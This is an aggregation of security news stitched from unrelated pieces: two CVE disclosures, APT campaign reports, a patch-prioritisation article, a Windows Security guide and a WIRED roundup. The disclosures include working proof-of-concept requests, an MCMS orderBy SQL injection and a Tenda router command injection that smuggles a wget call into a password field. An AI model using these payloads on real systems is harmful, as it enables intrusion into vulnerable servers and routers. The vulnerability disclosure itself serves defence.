MCMS v5.2.27 was discovered to contain a SQL injection vulnerability in the orderBy parameter at /dict/list.do.

A suspicious point was found in the IDictDao.xml file in the lib,ms-mdiy-2.1.12  
.net.mingsoft.mdiy.dao.IDictDao.xml#145  

Since the query maps to a method in Java, and this XML corresponds to Content,we looked directly in net.mingsoft.mdiy.action.DictAction and found a call to

net.mingsoft.mdiy.biz.dictBiz#query  

we can know that the suspicious injection point is orderBy, and then try to inject

    
    GET /ms/mdiy/dict/list.do?pageNo=1&pageSize=22&orderBy=1/**/or/**/updatexml(1,concat(0x7e,user(),0x7e),1)/**/or/**/1 HTTP/1.1
    Host: 10.28.246.83:8080
    Content-Length: 0
    Pragma: no-cache
    Accept: application/json, text/plain, */*
    Cache-Control: no-cache
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Origin: http://10.28.246.83:8080
    Referer: http://10.28.246.83:8080/ms/mdiy/dict/index.do?
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=AAF6841C2E815174E1AF5498DBEDD12F; rememberMe=d56VV14gjxKRUu7SYYOTuOS8X48lfVhblbN4aL/wCBkaL805vU01qmEfZCk2PpqohqQ4bUuxyGvEzVrXqlVgeKFxrQHcgxhKPbzopVs4p5ftVg3+jnz3WkOHLrycrJKOVR+peOYM+3bbysPywLp/w/PGdFU0+ooXhCJbO8qMeXvR6U6RSTOOnvBq/P9ySYdwnqt0uIywoCNv8hE6gAgnhZUt4PBYLlZ4EekzFyLDqKJXJ5sOUuzR8/fPGjOoVzMydW3EIFJ0f2i59RQJe4fsx6i1NlnR1C9muMEaDUqj70Ec+M50tjnStsJNPCrSYzl2+KMzPXpoBS1DWCpURi5/ZCBp/FahWwnJZ6cA0owYZC9dXNC1b1FQoC2fIO5SPcNtEyySdD6c6BnA9Leei5iYTEIkPKHIw1oQhF7voRadkfW40ZmdPUTot5Gd8g7pDqpNNd/sig45EQtGqeXWwP45T2BcE1OKkPC9D+ELtqQSzOWcu7GUQkJ7jsECXu+ghoq/uihlh5Xdx1a8H8hhznmpJJd3hK2W+fy1IBAiH4GzkhQbepycUPqxD0t+ufNTFN5B0upouiyMiHSLejjdIkCl325p4rLi8TchVRxsKS0/Z9PflifFvaauQoTalNDa+vZXYvBrnVjXyRl3cUn4HPzTPBVNpXqnHPxf1jNtxtJKL09szd3OMRABDyIvL+T0JHl8pskKjEo80luOEP5f+ta2TW1XutmZJupbr6d97mfeRE9GDIYWFuHafXkh5uSBTkauPpQA7x25vhs1BjU5OVZ2ipfcPvH6WaPCcBJYM8Vqyd6g+5mdpsw7Hb27LcGxFo9dE39pBNjy8+1q6QqIojSfTRLfz1f/wGKgdOqy3x9z2+0SYi+irxF52r7FQgBZtTcGUu+1WPJJQEmG3BnUAkI7hpG1BmmjeHjDRgnOvA+L1LugHVQUYNN/Z8XzahHcDkNHr54/WXeQP56p0LC/E/D+XMCOSxCYkYnZdboRABf4Hwj+THJSTp+ZRsFjrZt27WWhJtDfGTgahpJLPioFUT/3HCnZKz529Ia9R1dTMHaKlxYrxf04GvgNCiFmslLqZX+9RlZizYNXCLRKECj83ovRCFJP5Ofg9SK+fNKNruL4uW5U4B+vLEuLhxCv7BzGFpjjciIOh8z6ypCQJDkuYUv/rffs0F1ngGI8TdAKhFxMnVbyUplk0+cYVQaBx1JTablsA+VgSl8n8+qhDoNA44TBg4OsrTaSMhcCha5b7OwczozSFDvJOR15GXgIKbJOTGSAJ5JhFFeQhkmpVWOGC4d9KdmHl6KUIOyB8DtO2ZU/XpTPbvFQGLvyyo1t7dPrvzHqG9LYmoQAcye6278=
    Connection: close

CVE-2022-27466: MCMS 5.2.7 SQLI · Issue #90 · ming-soft/MCMS

According to folklore, witches were able to sail in a sieve, a strainer with holes in the bottom. Unfortunately, witches don’t work in cybersecurity – where networks generally have so many vulnerabilities that they resemble sieves. 
For most of us, keeping the sieve of our networks afloat requires nightmarishly hard work and frequent compromises on which holes to plug first.
The reason? In 2010,

According to folklore, witches were able to sail in a sieve, a strainer with holes in the bottom. Unfortunately, witches don't work in cybersecurity – where networks generally have so many vulnerabilities that they resemble sieves.

For most of us, keeping the sieve of our networks afloat requires nightmarishly hard work and frequent compromises on which holes to plug first.

The reason? In 2010, just under 5000 CVEs were recorded in the MITRE vulnerabilities database. By 2021, the yearly total had skyrocketed to over 20,000. Today, software and network integrity are synonymous with business continuity. And this makes the issue of which vulnerabilities to address first mission-critical. Yet owing to the countless documented vulnerabilities lurking in a typical enterprise ecosystem – across thousands of laptops, servers, and internet-connected devices – less than one in ten actually needs to be patched. The question is: how can we know which patches will ensure that our sieve doesn't sink?

This is why more and more companies are turning to Vulnerability Prioritization Technology (VPT). They seek solutions that filter out the flood of false positives generated by legacy tools and poorly-configured solutions and address only those vulnerabilities that directly affect their networks. They're leaving traditional vulnerability management paradigms behind and shifting to the next generation of VPT solutions.

****The Evolution of Vulnerability Management****

It's not news that even the most resource-rich enterprise can't possibly sort through, prioritize and patch every single vulnerability in their ecosystem. That's why the shift toward VPT started in the first place.

Initially, Vulnerability Management (VM) focused on scanning and detecting core networks for any vulnerabilities. This was known as Vulnerability Assessment (VA), and the deliverable was a massively long list of vulnerabilities that had little practical value for already overextended IT resources.

To make VA more actionable, the next generation of VM tools included vulnerability prioritization based on each vulnerability's global CVE scoring. This was further refined by adding another layer of prioritization based on estimations of potential damage, threat context, and, ideally, a correlation with local context to evaluate the potential business impact based on DREAD type models. This more advanced approach is known as Risk Based Vulnerability Management (RBVM) and was a giant leap forward from VA.

Yet even advanced VM tools implementing RBVM lag behind in sophistication and actionability. These tools can only detect what they know – meaning that misconfigured detection tools frequently result in missed attacks. They cannot evaluate whether security controls are configured to compensate for the severity of a given vulnerability according to its CVE score correlated with local context risk. This still results in bloated patching lists and also means that - just like with early-gen VA tools - patching often ends up at the bottom of the to-do list or is simply ignored by IT teams.

****Leveraging Next-Gen VPT****

Advanced VPT solutions are the next generation of VM – offering organizations a very different view of their unique cyber risks.

Building on traditional VA detection and more advanced RBVM capabilities, the latest generation of VPT solutions adds asset criticality context, environmental context, and multiple, pre-integrated threat intelligence sources. In this way, it effectively augments vulnerability severity data with sophisticated analytics and in-context applicability. These analytical capabilities enable advanced VPT solutions to integrate highly granular threat validation – creating the next generation of capabilities that augment traditional VM: Attack Based Vulnerability Management (ABVM).

ABVM is a game-changer. Because once network stakeholders are able to effectively validate the real-world threats facing their networks, they can test their environments based on actual exposure levels and permeability to attack. According to Gartner, the shift towards ABVM is crucial to better prioritization and assessment of vulnerabilities. It empowers security and risk management leaders to both generate recommendations and apply them directly to their security programs – addressing prioritized findings.

Leveraging ABVM, security stakeholders can identify _all_ undetected attacks, generate data and use cases that enable continuous improvement of detection and response tool configuration, and map out potential end-to-end attack paths with detailed local context. Once these yet unsecured attack paths are clearly mapped out, patching is too because threat validation coupled with a deep understanding of attack paths enables laser-focused patching prioritization. With ABVM, optimizing scarce patching resources to plug only those holes that threaten to sink the sieve becomes straightforward.

The move from traditional score-based VA or RBVM approaches to ABVM can lower patching load by 20%-50% while markedly improving overall security posture. By preventing security drift, ABVM also helps streamline SIEM toolsets – improving tool configuration, eliminating overlap, and identifying missing capabilities.

****The Bottom Line****

By improving security, reducing costs, refining resource allocation, and strengthening collaboration between teams, ABVM offers a new horizon of productivity and efficacy for security teams. Taking traditional VPT to the next level, ABVM solves chronic vulnerability patching overload, enabling networks to remain afloat even in today's threat-choked waters.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Which Hole to Plug First? Solving Chronic Vulnerability Patching Overload

A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information.
"The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week.
"The target of this attack is currently unknown but with high

A Chinese state-sponsored espionage group known as **Override Panda** has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information.

"The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week.

"The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country."

Override Panda, also called Naikon, Hellsing, and Bronze Geneva, is known to operate on behalf of Chinese interests since at least 2005 to conduct intelligence-gathering operations targeting ASEAN countries.

Attack chains unleashed by the threat actor have involved the use of decoy documents attached to spear-phishing emails that are designed to entice the intended victims to open and compromise themselves with malware.

Last April, the group was linked to a wide-ranging cyberespionage campaign directed against military organizations in Southeast Asia. Then in August 2021, Naikon was implicated in cyberattacks targeting the telecom sector in the region in late 2020.

The latest campaign spotted by Cluster25 is no different in that it leverages a weaponized Microsoft Office document to kick-start the infection killchain that includes a loader designed to launch a shellcode, which, in turn, injects a beacon for the Viper red team tool.

Available for download from GitHub, Viper is described as a "graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration."

The framework, similar to Cobalt Strike, is said to feature over 80 modules to facilitate initial access, persistence, privilege escalation, credential Access, lateral movement, and arbitrary command execution.

"By observing Naikon APT's hacking arsenal, it was concluded that this group tends to conduct long-term intelligence and espionage operations, typical for a group that aims to conduct attacks on foreign governments and officials," the researchers pointed out.

"To avoid detection and maximize the result, it changed different \[tactics, techniques, and procedures\] and tools over time."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese "Override Panda" Hackers Resurface With New Espionage Attacks

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: CVEIDs/TendaAX18 at main · F0und-icu/CVEIDs

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

Aamir Lakhani, global security strategist and researcher at FortiGuard Labs, zeroes in on how adversaries are targeting 'remote everything'.

Aamir Lakhani, global security strategist and researcher at FortiGuard Labs, zeroes in on how adversaries are targeting ‘remote everything’.

The rise of remote work and learning opened new opportunities for many people – as we’ve seen by the number of people who have moved to new places or adapted to “workcations.” Cybercriminals are taking advantage of the same opportunities – just in a different way. Evaluating the prevalence of malware variants by region reveals a sustained interest by cyber adversaries in maximizing the remote work and learning attack vector.

****What Malware Trends are Showing****

Our FortiGuard Labs research team dug into the prevalence of malware variants by region for the second half of 2021. What they found shows a sustained interest by cyber adversaries in maximizing the remote work and learning attack vector. The team found that various forms of browser-based malware were prevalent. Often, this takes the form of phishing lures or scripts that inject code or redirect users to malicious sites.

Detections vary across regions, of course, but can be largely grouped into three broad distribution mechanisms: Microsoft Office executables (MSExcel/, MSOffice/), PDF files and browser scripts (HTML/, JS/). Files packed with the Microsoft Intermediate Language (MSIL) are another common feature.

It’s worthy of note that some kinds of browser-based malware occupy the top spots in all regions. Such techniques have gained prominence recently as a way to exploit peoples’ desire for the latest news about COVID-19, politics, sports or any current headline. And since many are browsing from their home networks these days, there are fewer layers of protection between such malware and would-be victims (e.g., no corporate web filters).

****The Rise of Exploit Kits****

The use of exploit kits (EKs) is one element that has clearly helped cybercriminals in their efforts to execute malware. These kits are automated programs attackers use to exploit systems or applications. What makes an exploit kit very dangerous is its ability to identify victims while they browse the web. After they target a potential victim’s vulnerabilities, attackers can download and execute their malware of choice.

Exploit kits work automatically and silently as they look for vulnerabilities on a user’s machine while they browse the web. Currently, exploit kits are the preferred method for the distribution of remote access tools (RATs) or mass malware by cybercriminals, especially those seeking to profit financially from an exploit.

What’s especially insidious is that EKs don’t require victims to download a file or attachment. The victim need only browse on a compromised website, and then that site pulls in hidden code that attacks vulnerabilities in the user’s browser.

Currently, older kits are available to the public. Attackers have been taking these older kits and modifying them, making them more resilient to newer security detection strategies. Also, many of these kits are being advertised for sale online. Attackers offer these kits for rent on these sites and offer support and update contracts to guarantee they work against future updates.

****Addressing the Remote Everything Security Problem****

As hybrid work and learning become embedded paradigms in our culture, there are fewer layers of protection between malware and would-be victims. And bad actors are gaining access to more tools to help them pull off their nefarious deeds – like exploit kits. At the same time, the attack surface has rapidly expanded and continues to do so.

That means enterprises must take a work-from-anywhere approach to their security. They need to deploy solutions capable of following, enabling and protecting users no matter where they are located. They need security on the endpoint (EDR) combined with zero trust network access (ZTNA) approaches.

Another vital component and best practice of modern security strategy is the development of a holistic security mesh, wherein fully integrated security, services and threat intelligence seamlessly follow users on the road, at home or in the office to provide enterprise-grade protection and productivity across the extended network.

This simplifies and satisfies the demands of today’s three most common WFA scenarios: the corporate office, the home office and the mobile worker. Enterprises must secure mission-critical applications, so securing access to those applications, the networks to connect to those applications, and the devices that run those applications remain a vital component of a layered defense – even when working from a traditional location.

In the home office, risk lurks in the home networks that are often poorly secured with retail wireless routers and contain vulnerable IoT devices, which can be a pathway for hacker to gain access. And mobile workers regularly rely on untrusted and unsecured networks to access critical business resources. This can introduce unique threats, enabling cybercriminals to launch attacks against inadequately protected devices or intercept exposed communications.

A holistic integration of endpoint security, network security and ZTA/ZTNA addresses the challenges that WFA presents.

Criminals will make the most of any possible threat scenario, and the past two years have provided many opportunities for network attack. Malware trends and the rise of exploit kits have proven this point, and it’s now incumbent upon IT security teams to re-evaluate their security posture and adjust as needed. A comprehensive, integrated security mesh that accounts for all work possibilities is a best practice.

**_Aamir Lakhani is cybersecurity researcher and practitioner at FortiGuard Labs_.**

**_Enjoy additional insights from Threatpost’s Infosec Insiders community by visiting our microsite._**

Bad Actors Are Maximizing Remote Everything

A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022.
Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (

A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022.

Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (aka UNC2452/2652).

"This latest wave of spear phishing showcases APT29's enduring interests in obtaining diplomatic and foreign policy information from governments around the world," the Mandiant said in a report published last week.

The initial access is said to have been aided through spear-phishing emails masquerading as administrative notices, using legitimate but compromised email addresses from other diplomatic entities.

These emails contain an HTML dropper attachment called ROOTSAW (aka EnvyScout) that, when opened, triggers an infection sequence that delivers and executes a downloader dubbed BEATDROP on a target system.

Written in C, BEATDROP is designed to retrieve next-stage malware from a remote command-and-control (C2) server. It achieves this by abusing Atlassian's Trello service to store victim information and fetch AES-encrypted shellcode payloads to be executed.

Also employed by APT29 is a tool named BOOMMIC (aka VaporRage) to establish a foothold within the environment, followed by escalating their privileges within the compromised network for lateral movement and extensive reconnaissance of hosts.

What's more, a subsequent operational shift observed in February 2022 saw the threat actor pivoting away from BEATDROP in favor of a C++-based loader referred to as BEACON, potentially reflecting the group's ability to periodically alter their TTPs to stay under the radar.

BEACON, programmed in C or C++, is part of the Cobalt Strike framework that facilitates arbitrary command execution, file transfer, and other backdoor functions such as capturing screenshots and keylogging.

The development follows the cybersecurity company's decision to merge the uncategorized cluster UNC2452 into APT29, while noting the highly sophisticated group's propensity for evolving and refining its technical tradecraft to obfuscate activity and limit its digital footprint to avoid detection.

Nobelium, notably, breached multiple enterprises by means of a supply chain attack in which the adversary accessed and tampered with SolarWinds source code, and used the vendor's legitimate software updates to spread the malware to customer systems.

"The consistent and steady advancement in TTPs speaks to its disciplined nature and commitment to stealthy operations and persistence," Mandiant said, characterizing APT29 as an "evolving, disciplined, and highly skilled threat actor that operates with a heightened level of operational security (OPSEC) for the purposes of intelligence collection."

The findings also coincide with a special report from Microsoft, which observed Nobelium attempting to breach IT firms serving government customers in NATO member states, using the access to siphon data from Western foreign policy organizations.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia

Your Microsoft computer comes with built-in safety software that shields you from the worst threats. Here's how to navigate your toolkit.

For many years, Windows users had to rely on a third-party security tool to keep viruses and malware at bay, but now Microsoft's operating system comes with its own package, in the form of Windows Security.

It's designed to run quietly and efficiently in the background, and you might not have even noticed it's there—but it's important to know how it's keeping your computer safe, and the various options it gives you.

While you can add extra security software to Windows if you want, Windows Security should keep you well protected from danger. You can open it from the Start menu or by clicking its icon in the notification area.

Finding Your Way Around

Windows Security gives you an overview of your system's status.

Microsoft via David Nield

Open the main Windows Security dashboard and you should see a grid of icons, all with reassuring green check marks next to them—if something needs your attention, these check marks will be replaced by yellow exclamation marks. You can click on any of the items on the grid, from **Virus & threat protection** to **Protection history**, to jump to the relevant section inside the app.

The navigation pane on the left gives you another way of jumping between the various parts of Windows Security: The **Home** option is the one to go back to if you need to return to the main dashboard. Choose **Account protection**, for example, for options relating to your Microsoft account and to the way you sign in to Windows on your computer (including face and fingerprint recognition, if available).

**Firewall & network protection** is where you can monitor the firewall put up around Windows, for devices on your local network and in terms of the wider internet. If you decide to install a third-party security package, Windows Security can monitor this too and make sure everything is working correctly—if no firewall is active, you'll see an on-screen warning.

Choose **Settings** from the left-hand navigation bar to customize various aspects of Windows Security: These are mainly around the notifications the program displays, and any third-party security software you've installed. You're also able to click **Protection history** here to see what Windows Security has been up to recently, whether that's virus scans or alerts about security problems.

Running Virus and Malware Scans

Windows Security runs scans in the background while you use your device.

Microsoft via David Nield

In terms of actively keeping your computer safe and protected from threats, the **Virus & threat protection** section of Windows Security is the place to visit. As with the rest of the software, most of the features here will run in the background, but it's good to be aware of what's available and what you can do if you spot anything suspicious.

Click **Quick scan** if you suspect your computer may have been compromised—if you've downloaded and launched an email attachment you shouldn't have, for example. Quick Scan will look out for the most obvious threats and malware on your system and shouldn't take long to complete. You'll be able to see the progress of the scan as it runs, and you can keep working on your computer while it's scanning.

Select **Scan options** to run other types of scans. There's a **Full scan** option, which is more comprehensive than a quick scan and can take over an hour to complete, while a **Custom scan** enables you to focus a scan on specific folders if you think you know where a particular threat might be located. Finally, you'll see an **Offline scan** option that takes around 15 minutes and can remove the most stubborn types of malware.

You don't need to worry about setting a schedule for running virus and malware scans because Windows Security will take care of all of this for you. Click **Manage settings** under **Virus & threat protection settings** to make sure the **Real-time protection** option is turned on: This ensures the program is actively working in the background to spot security threats before they can do any damage to your system.

Other Windows Security Features

Windows Security looks after device maintenance too.

Microsoft via David Nield

If you pick **App & browser control** from the navigation pane on the left of Windows Security, you can have the software scan any applications you download and install: Windows Security considers a variety of factors when assessing whether a program is allowed to run on your computer, and you can customize some of this functionality here.

Select **Device security** to get to some of the more advanced security settings for your system. If your computer supports technologies like secure boot (checking for threats as your system starts up) and a trusted platform module (making it very difficult to tamper with the data on your system), you'll see them here. There are no settings to work through, but you can see if the features are present and working properly.

Then there's the **Device performance & health** page, which shows how Windows Security goes beyond actual security. Here you can see reports on the internal storage and battery of the device you're running Windows on and access what Microsoft calls a **Fresh start** process—this resets a lot of the settings on your system without affecting any of your files or the applications you've installed.

The **Family options** screen will be useful if you've got youngsters using Windows: You can set parental controls covering everything from the times the device can be used to what sort of content can be accessed. This works in tandem with the Microsoft Family Safety tools that you can access through your browser and that can cover multiple devices using the same Microsoft account.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   The takedown of the web’s biggest child abuse site
*   Get ready for a decade of uranus jokes
*   How to use BeReal, the “unfiltered” social media app
*   Should all video games be replayable?
*   The fake agents case baffling US intelligence experts
*   👁️ Explore AI like never before with our new database
*   📱 Torn between the latest phones? Never fear—check out our iPhone buying guide and favorite Android phones

How to Use Windows Security to Keep Your PC Protected

Microsoft claims Ukraine has been hit with hundreds of cyberattacks from well-known state-backed Russian hacking groups.
The post Russia continues digital onslaught against Ukrainian systems appeared first on Malwarebytes Labs.

According to Microsoft, at least six Kremlin-backed hacking groups have been attacking Ukraine in the digital space in an onslaught that began before the invasion in late February. The company counted more than 237 cyberattack operations against Ukrainian systems and critical infrastructure.

These attacks involve destructive malware that “threaten civilian welfare”, accompanied by intelligence gathering and reconnaissance.

APT28 (aka FancyBear), DEV-0586, Energetic Bear (aka Dragonfly), Gamaredon, Nobelium, Sandworm, and Turla are the nation-state actors carrying out the attacks.

“Russia’s use of cyberattacks appears to be strongly correlated and sometimes directly timed with its kinetic military operations targeting services and institutions crucial for civilians,” Microsoft said. The company gave several examples to illustrate this correlation: “While Russian forces besieged the city of Mariupol, Ukrainians began receiving an email from a Russian actor masquerading as a Mariupol resident, falsely accusing Ukraine’s government of ‘abandoning’ Ukrainian citizens.”

Russia was seen using various techniques in its attack to gain initial access. This includes phishing campaigns, vulnerability exploitation, and compromising upstream IT services. The country is also not shy about using wiper malware—destructive malware CISA (the Cybersecurity and Infrastructure Security Agency) and the FBI (Federal Bureau of Investigation) highlighted in an updated alert initially released in late February.

HermeticWiper, IsaacWiper, HermeticWizard, and CaddyWiper were deployed to Ukrainian networks in January 2022.

Microsoft believes that Russian cyberattacks will continue to escalate. Nation-state threat actors may also expand their destructive attacks outside Ukraine to retaliate against countries helping Ukraine or continuing to inflict punitive measures against Russia.

“We’ve observed Russian-aligned actors active in Ukraine show interest in or conduct operations against organizations in the Baltics and Turkey—all NATO member states actively providing political, humanitarian or military support to Ukraine.”

You can read more about Russian cyberattack activities against Ukraine in Microsoft’s Special Report: Ukraine.

Russia continues digital onslaught against Ukrainian systems

Plus: Trump backers breach election systems, Microsoft tracks Russia's war prep, a new Facebook leak reveals a mess, and Bored Ape Yacht Club gets hacked.

Surprising news abounded this week as Ukrainian officials weigh next steps in their digital campaigns against Russia, given that their efforts so far have been unexpectedly successful, if sometimes controversial. Overall, Russia is being pummeled with cyberattacks of all sorts at a scale beyond anything the country has dealt with before.

Meanwhile, new research indicates that a small group of North Koreans have taught themselves to jailbreak smartphones in an effort to bypass the regime's extensive digital restrictions and access forbidden media.

Elon Musk's bid this week to purchase Twitter highlighted a host of potential privacy and security concerns for the platform's users. The United States faced a notable spike in child sexual abuse sites in 2021 as CSAM hosting continued to increase dramatically around the world. Hollywood's fight against VPNs has gotten more heated as the entertainment industry expands its accusations about illegal activity enabled by the services. And Cloudflare recorded a historic DDoS attack that bombarded a cryptocurrency platform with 15.3 million requests.

If you feel like doing something for your own security or that of your business this weekend, we've got a roundup of all the most critical mainstream vulnerabilities from April that you can patch right now. 

And there's more. We’ve rounded up all the news that we didn’t break or cover in depth this week. Click on the headlines to read the full stories. And stay safe out there.

The Office of the Director of National Intelligence released its annual transparency report on Friday, which showed that the FBI conducted as many as 3.4 million warrantless searches of Americans’ data in 2021, including 1.9 million searches related to a Russian cyberattack. This is the first time ODNI has published a number for FBI searches utilizing the Foreign Intelligence Surveillance Act of 1978, or FISA. The law is meant to authorize investigative capabilities related to foreign threats, but it allows for some incidental domestic searches in the process. FISA activity has often been criticized for happening without public transparency.

In an in-depth analysis, Reuters looks at eight incidents around the country in which activists supportive of former President Donald Trump have attempted to breach or successfully compromised local voting systems as part of their quest to uncover evidence of manipulation in the 2020 US presidential election. In most cases, activists persuaded local election officials, all Republicans, to export and leak vote data. In the year and a half since Joe Biden became president, Trump loyalists have continued to falsely assert that voting machines across the US were compromised to produce Biden's win.

“These threats are being fueled by extreme elected officials and political insiders who are spreading the Big Lie”—that the 2020 vote was stolen—“to further suppress the vote, destabilize American elections, and undermine voter confidence,” Colorado Secretary of State Jena Griswold told Reuters in a statement.

In a report on Wednesday, Microsoft said it has found evidence that Russia began setting the stage for its invasion of Ukraine as early as March or April 2021. During that time, Russian state-backed hackers began establishing access points in Ukrainian government and critical infrastructure systems, researchers found. The attackers seem to have been collecting intelligence on the Ukrainian military, NATO member states, and diplomatic targets. In the report, Microsoft calls Russian aggression against Ukraine a “hybrid war” and says that Russian cyberattacks have been “relentless and destructive.” 

Microsoft reports that in early 2021, as Russian troops began to gather at the Ukrainian border, the Russian hacking group known as APT 29, Cozy Bear, and Nobelium began mounting phishing attacks to establish access. Microsoft says the Russian hacking group known as Ghostwriter was also active at this time, targeting Ukrainian military email accounts and networks with phishing attacks.

An internal Facebook document prepared last year and obtained by Motherboard lays out concerns from privacy engineers on the social network's Ad and Business Product team about the company's ability to account for the data it holds and track data as it moves through the service. The revelations are not necessarily surprising, given Facebook's sheer scale and recurrent data control issues, but they are significant as the tech giant works to comply with an increasing array of privacy legislations around the world. 

“We do not have an adequate level of control and explainability over how our systems use data, and thus we can’t confidently make controlled policy changes or external commitments such as ‘we will not use X data for Y purpose.’ And yet, this is exactly what regulators expect us to do, increasing our risk of mistakes and misrepresentation,” the document says.

A company spokesperson told Motherboard that the document “does not describe our extensive processes and controls to comply with privacy regulations” and that “this document reflects the technical solutions we are building to scale the current measures we have in place to manage data and meet our obligations.”

Hackers compromised the Instagram account of NFT collection Bored Ape Yacht Club on Monday, posting a link to a copycat site that scammed visitors out of NFTs. The company said in a statement to WIRED that “Rough estimated losses due to the scam are 4 Bored Apes, 6 Mutant Apes, and 3 BAKC, as well as assorted other NFTs estimated at a total value of ~$3m.” NFT scams and other cryptocurrency hustles in which attackers publish a malicious or misleading link to steal coins are unfortunately not new. The BAYC situation is particularly ominous, though, because the company says it had full two-factor authentication enabled on the Instagram account and that “the security practices surrounding the IG account were tight.” The group is investigating how the Instagram takeover occurred.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Tag

#intel